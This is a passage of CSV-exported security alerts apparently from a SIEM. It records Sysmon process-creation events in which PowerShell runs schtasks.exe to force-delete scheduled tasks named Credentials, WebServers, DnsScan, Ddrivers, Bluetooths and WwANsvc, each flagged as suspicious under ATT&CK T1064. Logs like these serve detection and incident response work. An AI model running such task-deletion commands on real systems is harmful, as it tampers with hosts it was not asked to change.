Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.343",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.022 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010a81e2f00} +ProcessId: 6348 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.024054200Z"",""eventRecordID"":""3582"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.022\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010a81e2f00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.022"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010a81e2f00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.312",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:09.965 +ProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901c2f00} +ProcessId: 4668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.969955600Z"",""eventRecordID"":""3581"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:09.965\r\nProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901c2f00}\r\nProcessId: 4668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WebServers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:09.965"",""processGuid"":""{df9fc3d3-b3f9-5ecf-0000-0010901c2f00}"",""processId"":""4668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WebServers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.304",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:09.925 +ProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901a2f00} +ProcessId: 6228 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsScan /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.933002800Z"",""eventRecordID"":""3580"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:09.925\r\nProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901a2f00}\r\nProcessId: 6228\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsScan /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:09.925"",""processGuid"":""{df9fc3d3-b3f9-5ecf-0000-0010901a2f00}"",""processId"":""6228"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsScan /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:37.328",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:09.101 +ProcessGuid: {df9fc3d3-b3f9-5ecf-0000-001058152f00} +ProcessId: 4196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Ddrivers /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.130118900Z"",""eventRecordID"":""3579"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:09.101\r\nProcessGuid: {df9fc3d3-b3f9-5ecf-0000-001058152f00}\r\nProcessId: 4196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Ddrivers /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:09.101"",""processGuid"":""{df9fc3d3-b3f9-5ecf-0000-001058152f00}"",""processId"":""4196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Ddrivers /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:37.297",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.973 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001022122f00} +ProcessId: 5000 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Bluetooths /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:09.024207700Z"",""eventRecordID"":""3577"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.973\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001022122f00}\r\nProcessId: 5000\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Bluetooths /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.973"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001022122f00}"",""processId"":""5000"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Bluetooths /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" 
-Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:37.281",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.878 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ca0f2f00} +ProcessId: 8140 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.889431900Z"",""eventRecordID"":""3576"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.878\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ca0f2f00}\r\nProcessId: 8140\r\nImage: 
C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.878"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-0010ca0f2f00}"",""processId"":""8140"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
